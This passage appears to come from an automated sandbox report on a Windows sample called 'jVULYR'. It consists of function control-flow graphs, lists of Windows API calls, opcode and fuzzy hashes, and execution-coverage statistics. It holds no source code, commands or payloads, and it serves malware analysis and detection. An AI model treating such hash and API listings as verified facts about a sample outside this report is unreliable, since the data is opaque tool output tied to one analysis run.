                                                  control_flow_graph 654 11a6bd6-11a6bd9 655 11a6bda-11a6ca1 CreateActCtxA 654->655 657 11a6caa-11a6d04 655->657 658 11a6ca3-11a6ca9 655->658 665 11a6d13-11a6d17 657->665 666 11a6d06-11a6d09 657->666 658->657 667 11a6d28 665->667 668 11a6d19-11a6d25 665->668 666->665 670 11a6d29 667->670 668->667 670->670
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 011A6C91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.376870946.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_11a0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 4a0ac44762944d4f42463676578d1bbdb47d47fbd2b268aa98c92f1cd19dae93
                                                  • Instruction ID: 7fbbd7cf5bba02c5e542b7eae1930c91d8cf5af212f78709d853c07a2573ccfb
                                                  • Opcode Fuzzy Hash: 4a0ac44762944d4f42463676578d1bbdb47d47fbd2b268aa98c92f1cd19dae93
                                                  • Instruction Fuzzy Hash: 1A4104B1C04718CEDB24CFA9D844B9EBBB1FF44308F548069D549AB250D7756985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 011A57E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 671 11a57e4-11a6ca1 CreateActCtxA 674 11a6caa-11a6d04 671->674 675 11a6ca3-11a6ca9 671->675 682 11a6d13-11a6d17 674->682 683 11a6d06-11a6d09 674->683 675->674 684 11a6d28 682->684 685 11a6d19-11a6d25 682->685 683->682 687 11a6d29 684->687 685->684 687->687
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 011A6C91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.376870946.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_11a0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 8b4c76753b9345feda308d01952c58f8e30747994a8f8b8e85824bb5bc57e342
                                                  • Instruction ID: 73863dcafcd91c58d5814f945e88f19a83d43c801fb16ecc31a53c807a338f86
                                                  • Opcode Fuzzy Hash: 8b4c76753b9345feda308d01952c58f8e30747994a8f8b8e85824bb5bc57e342
                                                  • Instruction Fuzzy Hash: C64101B1C04718CBDB24CFA9D884B9EBBB1FF48308F648069D509BB240DBB56985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 011ADED0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 688 11aded0-11adf0c 689 11adfbc-11adfdc 688->689 690 11adf12-11adf17 688->690 696 11adfdf-11adfec 689->696 691 11adf6a-11adfa2 CallWindowProcW 690->691 692 11adf19-11adf50 690->692 694 11adfab-11adfba 691->694 695 11adfa4-11adfaa 691->695 698 11adf59-11adf68 692->698 699 11adf52-11adf58 692->699 694->696 695->694 698->696 699->698
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 011ADF91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.376870946.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_11a0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: cbe123d2cbb3cfc7eb94a071e85dc036ce868019322fa14b57bd933faacf36cd
                                                  • Instruction ID: 35f12aac470443e1db667c661eaa25e8eb92e075b819be670aad01d10b38e764
                                                  • Opcode Fuzzy Hash: cbe123d2cbb3cfc7eb94a071e85dc036ce868019322fa14b57bd933faacf36cd
                                                  • Instruction Fuzzy Hash: 8D4158B89007458FDB14CF99D448AABBBF9FF88314F258458E518A7321D774A846CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08D59010 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 702 8d59010-8d5907a PostMessageW 703 8d59083-8d59097 702->703 704 8d5907c-8d59082 702->704 704->703
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 08D5906D
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.405334436.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_8d50000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: ae75a78539d94322d6e7384cf360bddddeb7852acfba22a615425f6d99fd7d0e
                                                  • Instruction ID: 66cec89451aa3c5f72573f43210de4a072a024f0682e17da198a368fb9c38377
                                                  • Opcode Fuzzy Hash: ae75a78539d94322d6e7384cf360bddddeb7852acfba22a615425f6d99fd7d0e
                                                  • Instruction Fuzzy Hash: 1D11E5B5800349DFDB10CF99D885BDEBFF8EB48324F10891AE954A7600C375A584CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EAD210 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0e4cecf88c55ec70851149b02b3945fc949d7d08f90aaaf4a456a8727e77523
                                                  • Instruction ID: 26bf3fcbe22e598c1a8a6f95df1586ad7daffd9f1b2fadea9d69a89276cee300
                                                  • Opcode Fuzzy Hash: e0e4cecf88c55ec70851149b02b3945fc949d7d08f90aaaf4a456a8727e77523
                                                  • Instruction Fuzzy Hash: 6F212471508240DFCB05CF40DDC0B26BB65FB8D318F248569E9065E656C336E816DBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EAD4D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66e7225576c7594dc19d32e46e5e0d07d6d724aadd28279e279975717c04c1fd
                                                  • Instruction ID: a6f8682daeea4129694139d928a27a2237d128cd845509b0e472c819662c8ac5
                                                  • Opcode Fuzzy Hash: 66e7225576c7594dc19d32e46e5e0d07d6d724aadd28279e279975717c04c1fd
                                                  • Instruction Fuzzy Hash: 152145B1908244DFCB04CF00DDC0B26BBA5FB8D32CF2485A8E9065F606C336E856DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EBD01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdf2b0bb61af59d2050faa4d33fb237cf7b95165d9424d70e424a8b9d02b679d
                                                  • Instruction ID: 3a0792ef82f9cdfc3a96658c8174614d34abb9f26541b0fc1e194b54d8a728d1
                                                  • Opcode Fuzzy Hash: fdf2b0bb61af59d2050faa4d33fb237cf7b95165d9424d70e424a8b9d02b679d
                                                  • Instruction Fuzzy Hash: D821257560C240DFCB14EF14D9C0B67BB66FB88318F24C569D9095B246D33AD846DAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EBD1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b6f535c514200c1485cf6676a5f5689d0d9e58fb823ae6a89f4dfaaa530063e
                                                  • Instruction ID: 2001d9d40153c2e92e9f3e9eec0843c26e52b4e8b13a7794cc64a10a04f40b09
                                                  • Opcode Fuzzy Hash: 5b6f535c514200c1485cf6676a5f5689d0d9e58fb823ae6a89f4dfaaa530063e
                                                  • Instruction Fuzzy Hash: B2213771508284DFCB05CF50DDC0BA7BB65FB88318F24C56DD9095B256D336D846CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EBD005 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87387256be4096435f416303e011742193a2f9dcc8f72b288753cc61e2269b27
                                                  • Instruction ID: d2b9434e7eeb374ba3bad5b3172a53d5545331b0aa33237b9183018da90a3ac8
                                                  • Opcode Fuzzy Hash: 87387256be4096435f416303e011742193a2f9dcc8f72b288753cc61e2269b27
                                                  • Instruction Fuzzy Hash: 9121807550D3C08FCB12CF20D990756BF71EB46314F28C5EAD8498B697C33A980ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EAD20B Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01630ae60a6f14e2ae99e77285fa1d8ce58a37d8d61a71497013aec5d44c3189
                                                  • Instruction ID: 883db3a4914d506cd0c9710521f593c996189893e170356a8c6709329ac04f1d
                                                  • Opcode Fuzzy Hash: 01630ae60a6f14e2ae99e77285fa1d8ce58a37d8d61a71497013aec5d44c3189
                                                  • Instruction Fuzzy Hash: 29219076404280DFCB16CF50D9C4B16BF71FB89324F2485A9D8051A656C336D866CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EAD4D3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction ID: 8f95e25447e6ffeff269c0af64fe45869a6a6ab9b45e50da365b80aa9bacbbfe
                                                  • Opcode Fuzzy Hash: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction Fuzzy Hash: 8611B176804280CFCF11CF10D9C4B16BF71FB99328F2486A9D8061F616C33AE85ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EBD1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ec00427063a39186f2fb4650df0103d6deb5ba7185f4ec336243a5f515f8492
                                                  • Instruction ID: 78522e22a12d796bda8636bee384d3cfec7f324ca63eb857f36ea20b3d6290a7
                                                  • Opcode Fuzzy Hash: 1ec00427063a39186f2fb4650df0103d6deb5ba7185f4ec336243a5f515f8492
                                                  • Instruction Fuzzy Hash: F111BE75508280DFCB12CF50C9C0B56BB61FB84328F24C6A9D8494B666C33AD85ACF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EAD745 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83c87b1ae345b2fc1270190c2c02597dfd80dca3b4add8fc7caae3b9b45a4d4e
                                                  • Instruction ID: 8d056d7e7bafcd16b010e2c42a7ad85677b9ffbc595bab47a0a45673f8672be0
                                                  • Opcode Fuzzy Hash: 83c87b1ae345b2fc1270190c2c02597dfd80dca3b4add8fc7caae3b9b45a4d4e
                                                  • Instruction Fuzzy Hash: E501FC7100C3809EE7144E25CD84766BB98DF4A37CF14855BFA066F646C379A844C671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EAD744 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c084e4802d2ff18f8209eb3ffb88f93972c64bac73e8d95f9c286f0ad0669d8
                                                  • Instruction ID: 6fa2b7576def83265722955ebaa981ea70cd16112cd55ed38b3a706e586a3525
                                                  • Opcode Fuzzy Hash: 6c084e4802d2ff18f8209eb3ffb88f93972c64bac73e8d95f9c286f0ad0669d8
                                                  • Instruction Fuzzy Hash: 80F062714082849EEB148E16CC84B62FB98EB46778F18C45BFD095F686C379A844CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:8.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:6.2%
                                                  Total number of Nodes:65
                                                  Total number of Limit Nodes:1
                                                  execution_graph 37539 2c0b0d0 37540 2c0b0ee 37539->37540 37543 2c09e18 37540->37543 37542 2c0b125 37544 2c0cff8 LoadLibraryA 37543->37544 37546 2c0d0d4 37544->37546 37547 2c04560 37548 2c04574 37547->37548 37551 2c047aa 37548->37551 37549 2c0457d 37552 2c047b3 37551->37552 37557 2c04880 37551->37557 37563 2c0498c 37551->37563 37569 2c049a6 37551->37569 37575 2c04890 37551->37575 37552->37549 37558 2c048d4 37557->37558 37559 2c049cb 37558->37559 37581 2c04cd8 37558->37581 37590 2c04c98 37558->37590 37595 2c04c88 37558->37595 37564 2c0493f 37563->37564 37565 2c049cb 37564->37565 37566 2c04cd8 2 API calls 37564->37566 37567 2c04c88 2 API calls 37564->37567 37568 2c04c98 2 API calls 37564->37568 37566->37565 37567->37565 37568->37565 37570 2c049b9 37569->37570 37571 2c049cb 37569->37571 37572 2c04cd8 2 API calls 37570->37572 37573 2c04c88 2 API calls 37570->37573 37574 2c04c98 2 API calls 37570->37574 37572->37571 37573->37571 37574->37571 37576 2c048d4 37575->37576 37577 2c049cb 37576->37577 37578 2c04cd8 2 API calls 37576->37578 37579 2c04c88 2 API calls 37576->37579 37580 2c04c98 2 API calls 37576->37580 37578->37577 37579->37577 37580->37577 37582 2c04ce6 37581->37582 37583 2c04c96 37582->37583 37585 2c04d0c 37582->37585 37588 2c04cd8 RtlEncodePointer 37583->37588 37600 2c04ce8 37583->37600 37584 2c04cb6 37584->37559 37586 2c04d75 37585->37586 37587 2c04d4c RtlEncodePointer 37585->37587 37586->37559 37587->37586 37588->37584 37591 2c04ca6 37590->37591 37593 2c04cd8 2 API calls 37591->37593 37594 2c04ce8 RtlEncodePointer 37591->37594 37592 2c04cb6 37592->37559 37593->37592 37594->37592 37596 2c04ca6 37595->37596 37598 2c04cd8 2 API calls 37596->37598 37599 2c04ce8 RtlEncodePointer 37596->37599 37597 2c04cb6 37597->37559 37598->37597 37599->37597 37601 2c04d22 37600->37601 37602 2c04d4c RtlEncodePointer 37601->37602 37603 2c04d75 37601->37603 37602->37603 37603->37584 37535 634ceb0 37536 634cecf 37535->37536 37537 634cf03 LdrInitializeThunk 37536->37537 37538 634cf20 37537->37538 37608 634db40 37610 634db65 37608->37610 37609 634dcdf 37610->37609 37611 634e2c4 LdrInitializeThunk 37610->37611 37611->37610 37604 6348308 37605 6348327 LdrInitializeThunk 37604->37605 37607 634835b 37605->37607

                                                  Executed Functions

                                                  Function 0634DB40 Relevance: 2.3, APIs: 1, Instructions: 760libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 167 634db40-634dc46 184 634dc9d-634dca7 167->184 185 634dc48-634dc89 167->185 188 634dcad-634dcdd call 634bd24 184->188 185->184 191 634dc8b-634dc9b 185->191 196 634dced-634e09a 188->196 197 634dcdf-634dce8 188->197 191->188 236 634e685-634e6a8 196->236 237 634e0a0-634e0ad 196->237 198 634e6b8-634e6c5 197->198 239 634e6ad-634e6b7 236->239 238 634e0b3-634e11e 237->238 237->239 238->236 250 634e124-634e159 238->250 239->198 253 634e182-634e18a 250->253 254 634e15b-634e180 250->254 257 634e18d-634e1d6 call 634bd30 253->257 254->257 263 634e66c-634e672 257->263 264 634e1dc-634e234 call 634bd3c 257->264 263->236 265 634e674-634e67d 263->265 264->263 272 634e23a-634e244 264->272 265->238 266 634e683 265->266 266->239 272->263 273 634e24a-634e25d 272->273 273->263 274 634e263-634e28a 273->274 278 634e290-634e293 274->278 279 634e62d-634e650 274->279 278->279 280 634e299-634e2d3 LdrInitializeThunk 278->280 287 634e655-634e65b 279->287 290 634e2d9-634e328 280->290 287->236 288 634e65d-634e666 287->288 288->263 288->274 298 634e46d-634e473 290->298 299 634e32e-634e367 290->299 300 634e475-634e477 298->300 301 634e481 298->301 303 634e489-634e48f 299->303 316 634e36d-634e3a3 299->316 300->301 301->303 304 634e491-634e493 303->304 305 634e49d-634e4a0 303->305 304->305 307 634e4ab-634e4b1 305->307 309 634e4b3-634e4b5 307->309 310 634e4bf-634e4c2 307->310 309->310 312 634e411-634e441 call 634bd48 310->312 318 634e443-634e462 312->318 322 634e4c7-634e4f5 call 634bd54 316->322 323 634e3a9-634e3cc 316->323 326 634e468 318->326 327 634e4fa-634e54c 318->327 322->318 323->322 333 634e3d2-634e405 323->333 326->287 346 634e556-634e55c 327->346 347 634e54e-634e554 327->347 333->307 345 634e40b 333->345 345->312 349 634e55e-634e560 346->349 350 634e56a 346->350 348 634e56d-634e58b 347->348 354 634e58d-634e59d 348->354 355 634e5af-634e62b 348->355 349->350 350->348 354->355 358 634e59f-634e5a8 354->358 355->287 358->355
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523988856.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_6340000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ac0790d3d4085b8e0a3cfd5b157e85492c66a157270e2c97caeff773e287adb7
                                                  • Instruction ID: ae9924ef4bb620bdf7cff8508df31ee8f4f6aa92d6e323da84f6eb4921f3bb6a
                                                  • Opcode Fuzzy Hash: ac0790d3d4085b8e0a3cfd5b157e85492c66a157270e2c97caeff773e287adb7
                                                  • Instruction Fuzzy Hash: 32621970E006198BCB64EF78C95479DB7F1AF89304F1186A9D54AAB750EF30AE85CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0634CEB0 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 494 634ceb0-634cf1a call 6347df0 call 6347f08 LdrInitializeThunk 504 634cf20-634cf3a 494->504 505 634d063-634d080 494->505 504->505 508 634cf40-634cf5a 504->508 517 634d085-634d08e 505->517 511 634cf60 508->511 512 634cf5c-634cf5e 508->512 514 634cf63-634cfbe call 634bcc0 511->514 512->514 524 634cfc4 514->524 525 634cfc0-634cfc2 514->525 526 634cfc7-634d061 call 634bcc0 524->526 525->526 526->517
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523988856.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_6340000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b5ea97c22e097188cc04366320467d45c3d604c509832de3e7197edff7716e37
                                                  • Instruction ID: 7ac230e8685c7d630695ca234ee1b15c1c9b03c8e50cac81c55d8775a08fd3a8
                                                  • Opcode Fuzzy Hash: b5ea97c22e097188cc04366320467d45c3d604c509832de3e7197edff7716e37
                                                  • Instruction Fuzzy Hash: 66518571E102059FCB54EBB4D894BAEB7F6BF84304F158A69E5029B790DF70E909CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0579F86B Relevance: .5, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523161847.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_5790000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54a957ef2425612971bdd423012319f9858537c83c234a5344bcb44ae2378d1f
                                                  • Instruction ID: aa182ba5d11bdf228046127aaa8b1242b3bf9422ed278a0b30b89f43cf6e7c72
                                                  • Opcode Fuzzy Hash: 54a957ef2425612971bdd423012319f9858537c83c234a5344bcb44ae2378d1f
                                                  • Instruction Fuzzy Hash: 0E028C70B042149FDB18DBA8D854BAEB7F2BF89300F258569E515EB385DB34EC45CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06348308 Relevance: 1.7, APIs: 1, Instructions: 185libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 371 6348308-6348354 LdrInitializeThunk 375 634835b-6348367 371->375 376 6348583-6348596 375->376 377 634836d-6348376 375->377 378 63485bd-63485c1 376->378 379 634837c-6348391 377->379 380 63485b8 377->380 381 63485c3 378->381 382 63485cc 378->382 384 6348393-63483a6 379->384 385 63483ab-63483c6 379->385 380->378 381->382 386 63485cd 382->386 387 6348557-634855b 384->387 396 63483d4 385->396 397 63483c8-63483d2 385->397 386->386 388 6348566-634856f 387->388 389 634855d 387->389 393 6348571-634857d 388->393 394 63485b3 388->394 389->388 393->376 393->377 394->380 398 63483d9-63483db 396->398 397->398 399 63483f5-634848e 398->399 400 63483dd-63483f0 398->400 418 6348490-634849a 399->418 419 634849c 399->419 400->387 420 63484a1-63484a3 418->420 419->420 421 63484a5-63484a7 420->421 422 6348501-6348555 420->422 423 63484b5 421->423 424 63484a9-63484b3 421->424 422->387 426 63484ba-63484bc 423->426 424->426 426->422 427 63484be-63484ff 426->427 427->422
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523988856.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_6340000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: caaa6d0d6480d6389f94f672985e7d63cd32424430d886e900d36a5175c90986
                                                  • Instruction ID: 67ae32257d6e6d94aee7536dcbcc103a7808f11c93ca514fd2bb7451b7d4a19b
                                                  • Opcode Fuzzy Hash: caaa6d0d6480d6389f94f672985e7d63cd32424430d886e900d36a5175c90986
                                                  • Instruction Fuzzy Hash: 22713930E10209CFDB54EFB4D5587AEBBF6AF84308F148929D506AB294DF79E945CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0634CE50 Relevance: 1.7, APIs: 1, Instructions: 167libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 438 634ce50-634ce6f 439 634ce94-634cee7 call 6347df0 call 6347f08 438->439 440 634ce71-634ce7b 438->440 451 634ceef-634cef5 439->451 441 634ce90-634ce93 440->441 442 634ce7d-634ce8e 440->442 442->441 452 634cefc 451->452 453 634cf03-634cf1a LdrInitializeThunk 452->453 454 634cf20-634cf3a 453->454 455 634d063-634d080 453->455 454->455 458 634cf40-634cf5a 454->458 467 634d085-634d08e 455->467 461 634cf60 458->461 462 634cf5c-634cf5e 458->462 464 634cf63-634cfbe call 634bcc0 461->464 462->464 474 634cfc4 464->474 475 634cfc0-634cfc2 464->475 476 634cfc7-634d061 call 634bcc0 474->476 475->476 476->467
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.523988856.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_6340000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d99ce401d36b477cf742bcc72a48b8e3bc45d7a6905eb526513d098f29191bfd
                                                  • Instruction ID: 5cdce682bbe092b6456f3ce0f9599a58e551a8f99c8c37a42f14c8afb95f0348
                                                  • Opcode Fuzzy Hash: d99ce401d36b477cf742bcc72a48b8e3bc45d7a6905eb526513d098f29191bfd
                                                  • Instruction Fuzzy Hash: 9C51A171E102059FCB44EBB4D894BAEB7F6AF84304F048969E506DB395EF30E8098B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C09E18 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 544 2c09e18-2c0d04f 546 2c0d051-2c0d05b 544->546 547 2c0d088-2c0d0d2 LoadLibraryA 544->547 546->547 548 2c0d05d-2c0d05f 546->548 554 2c0d0d4-2c0d0da 547->554 555 2c0d0db-2c0d10c 547->555 549 2c0d061-2c0d06b 548->549 550 2c0d082-2c0d085 548->550 552 2c0d06d 549->552 553 2c0d06f-2c0d07e 549->553 550->547 552->553 553->553 557 2c0d080 553->557 554->555 559 2c0d11c 555->559 560 2c0d10e-2c0d112 555->560 557->550 562 2c0d11d 559->562 560->559 561 2c0d114 560->561 561->559 562->562
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?), ref: 02C0D0C2
                                                  Memory Dump Source
                                                  • Source File: 00000019.00000002.517156444.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_25_2_2c00000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 2a721fc87b97935753aa5e2c0c3e994705474ab76921f88fd3759a0901676541
                                                  • Instruction ID: 265eeb0ba40df739bc0fcf0f5b3a480ce534e893b71330a6508483dcb996b17d
                                                  • Opcode Fuzzy Hash: 2a721fc87b97935753aa5e2c0c3e994705474ab76921f88fd3759a0901676541
                                                  • Instruction Fuzzy Hash: 973149B0D042498FDB10CFE9D885B9EBBF1FF48318F148529E81AA7280D7749486CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C0CFEC Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
